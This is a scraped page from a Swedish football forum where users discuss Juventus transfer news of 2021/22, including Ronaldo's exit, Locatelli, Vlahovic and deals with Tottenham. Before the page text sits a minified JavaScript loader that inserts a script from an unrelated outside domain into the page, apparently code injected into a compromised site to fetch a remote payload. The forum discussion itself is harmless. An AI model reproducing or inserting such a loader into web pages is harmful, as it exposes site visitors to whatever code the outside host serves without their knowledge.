;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Juventus F.C. 2021/22 – Sida 2 – Fotboll – FMSweden Forum
Meny Stäng

Juventus F.C. 2021/...

Share:
Notifications
Clear all

Juventus F.C. 2021/22

34 Inlägg
5 Users
12 Reactions
2,117 Visningar
Challa
(@challa)
Estimable Member
Topic starter  

I dagarna kom också den trevliga nyheten att Chiellini förlängt till 2023. Vi hoppas på en skadefri säsong!

Mitt liv är en multimediafil

SvaraCitera
Challa
(@challa)
Estimable Member
Topic starter  

De flesta trovärdiga källorna bekräftar nu att Juventus och Sassuolo kommit överens om Locatelli, det ska röra sig om: 

• Två år lån
  • 30M + eventuella bonusar på 5M
  • Betalas över tre år
  • 20 % på ev. framtida försäljning

En av ungdomarna som varit aktuella för a-laget, Felix Correia, har lånats ut till Parma. 

Med det kan vi nog utgå från att Juventus är så gott som klara med årets fönster, bortsett från ett par potenitella lån, t.ex. Pellegrini och Fagiolo. 

SvaraCitera
Challa
(@challa)
Estimable Member
Topic starter  

Det verkar som att det trots allt kan bli en händelserik avslutning på fönstret. Igår landade Mendes i Turin och skall ha haft möte med Ronaldo och klubben. Juventus sägs vilja ha cirka 30M i övergångssumma för att släppa.

Idag besöker Mino Raiola Coninassa. Antagligen för att diskutera potentiella ersättare till Ronaldo (?). Sannolikt rör det sig väl i så fall om Moise Kean.  Raiola har annars ett antal intressanta namn i stallet såsom Pogba, Gravenberch, Håland osv. men det känns inte realistiskt att någon av dessa skulle ansluta.

De kan också röra sig om ett möte gällande Pellegrini, De Ligt eller Wesley som alla har Raiola som agent. 

SvaraCitera
Challa
(@challa)
Estimable Member
Topic starter  

Då kan vi konstatera att Ronaldo med stor sannolikhet lämnar Juventus. Personligen är jag rätt indifferent till hans avsked. Levererade målmässigt, men en enorm bromskloss i spelet, samt att han sköt bort alla frisparkar i tre säsonger.

Juventus manager Allegri: "I'm not disappointed by Cristiano Ronaldo. He wants to leave Juventus and he made a choice, he's gonna look for a new club after three years here. It's part of the life”.

Ryktas om att Kean är på väg in på lån + köpoption, kostnad på cirka 25-30M totalt. Jag tror inte man ska utesluta att det kan ansluta någon spelare till med tanke på det budgetutrymmet som Ronaldos försäljning frigör.

SvaraCitera
Challa
(@challa)
Estimable Member
Topic starter  

Mycket talar för att Vlahovic kommer att värvas av Juventus redan i vinter. Siffror som nämns är 75 M + bonusar till Fiorentina och 5,5 års kontrakt med 7 M lön för Vlahovic.

Kring Dybalas kontraktförnyelse finns det inte mycket att gå på mer än att man är muntligt överens sedan oktober 2021 men att klubben nu senarelagt förnyelsen till februari i enighet med klubbens nya lönepolicy. Det kan potentiellt har förstört relationen mellan ledningen och spelaren. 

Juventus har som bekant stora utmaningar med den lönestruktur Paratici byggde upp under sin direkt genomusla insats som sportchef (grattis tottenham). De tre spelarna som varit sämst i klubben senaste två åren ligger på topp tio listan över löner (hint: Ramsey, Rabiot och Sandro): 

Övriga rykten med substans:

- Kulusevski eventuellt ut på lån

- Arthur till Arsenal

- Morata till Barcelona

- Bentancur till Aston Villa 

- Köp av Nandez

SvaraCitera
Challa
(@challa)
Estimable Member
Topic starter  

Det finns förövrigt utrymme för ytterligare förvärv, antingen under januari eller till sommaren, till följd av den kapitalanskaffning som genomfördes i fjol. Rapporter gör gällande att föredelningen av de 400 M som anskaffades sker enligt nedan:

-75m anticipated by EXOR

-5m ancillary costs

-90m payments to banks

-145m to cover club needs for the next 12 months

-85m is for the transfer market

SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member

Postad av: @challa

Mycket talar för att Vlahovic kommer att värvas av Juventus redan i vinter. Siffror som nämns är 75 M + bonusar till Fiorentina och 5,5 års kontrakt med 7 M lön för Vlahovic.

Kring Dybalas kontraktförnyelse finns det inte mycket att gå på mer än att man är muntligt överens sedan oktober 2021 men att klubben nu senarelagt förnyelsen till februari i enighet med klubbens nya lönepolicy. Det kan potentiellt har förstört relationen mellan ledningen och spelaren. 

Juventus har som bekant stora utmaningar med den lönestruktur Paratici byggde upp under sin direkt genomusla insats som sportchef (grattis tottenham). De tre spelarna som varit sämst i klubben senaste två åren ligger på topp tio listan över löner (hint: Ramsey, Rabiot och Sandro): 

Övriga rykten med substans:

- Kulusevski eventuellt ut på lån

- Arthur till Arsenal

- Morata till Barcelona

- Bentancur till Aston Villa 

- Köp av Nandez

Intressant. Moratta måste tillbaka. Varför lämnade han ens?

SvaraCitera
Challa
(@challa)
Estimable Member
Topic starter  

@argt-troll Finns olika teorier. Marotta har i vilket fall varit ute och kommenterat att det inte var på hans initiativ. Det pratas ofta om att Marotta inte gillade förnyelseprojektet inom klubben och var motståndare till värvningen av Ronaldo.

SvaraCitera
raca14
(@raca14)
Reputable Member

Morata till Barca?!

Skulle han verkligen vilja gå dit när han är född och uppvuxen i Madrid och fostrad i Real?

SvaraCitera
Challa
(@challa)
Estimable Member
Topic starter  

@raca14 Det finns säkert fler alternativ, men främst Barcelona som det skrivits om. Kan också hålla med om att det låter som en relativt ologisk övergång sett till bakgrunden, men tror inte heller att det kryllar av alternativ. 

SvaraCitera
Challa
(@challa)
Estimable Member
Topic starter  

Det rapporteras nu om att Juventus jobbar intensivt med att lösa Zakaria innan fönstret stänger. Man sägs vara överens med spelaren och har suttit i möte med Gladbach flera timmar. 

SvaraCitera
Challa
(@challa)
Estimable Member
Topic starter  

Skrivs om att Juventus jobbar på att sälja Kulusevski och Bentancur till Tottenhams. Ryktas om 60 M för båda. Hatten av till Arrivabene och Cherubini om dom löser detta.

En förutsättning för att ta in Zakaria är nog att minst en mittfältare försvinner (Bentancur, Ramsey, Arthur eller Rabiot sannolikt). Det ryktas annars om lån av Bandet, samt om att man jobbar på att låna ut Kaio till Cagliari.

SvaraCitera
Challa
(@challa)
Estimable Member
Topic starter  

Då rapporterar Romano om att Bentancur och Kulusevski är klara för Tottenhamn. Det handlar om följande deals:

Bentancur: 19M + 6M i bonusar. Värt att notera är att Boca har en vidareförsäljningsklausul på 30 %

Kulusevski: 18 månader lån. 40M total kostnad, inklusive låneavgift med köpklausul som blir obligatorisk om man når CL, alternativt om Kulusevski uppnår ett antal matcher.

Samtidigt verkar det bara kvarstå detaljer för förvärvet av Zakaria.

SvaraCitera
Challa
(@challa)
Estimable Member
Topic starter  

Då är siffrorna för Dejan och Bentancur officiella och de är på en nivå så att man börjar fundera på om Juventus planterat Paratici i Spurs:

Dejan:

- Lån 10 M, varav 3 M 2021/22 och 7M 2022/23

- Bindande köp om man uppnår vissa sportsliga resultat

- Köpoption i övriga fall. 

- Oavsett är priset 35 M

Bentancur:

Permanent övergång, 19 M +6 M eventuella bonusar. Betalas över tre år. 

Zakaria är officiellt klart och man har också säkrat den eftertraktade talangen Gatti som blir kvar i Frosinone på lån året ut. 

Även Ramsey ryktas vara klar för Rangers, dit han går på lån och Juventus finansierar 30 % av lönen. 

Ett snudd på perfekt fönster av Cherubini och Arrivabene.

SvaraCitera
Sida 2 / 2
Share: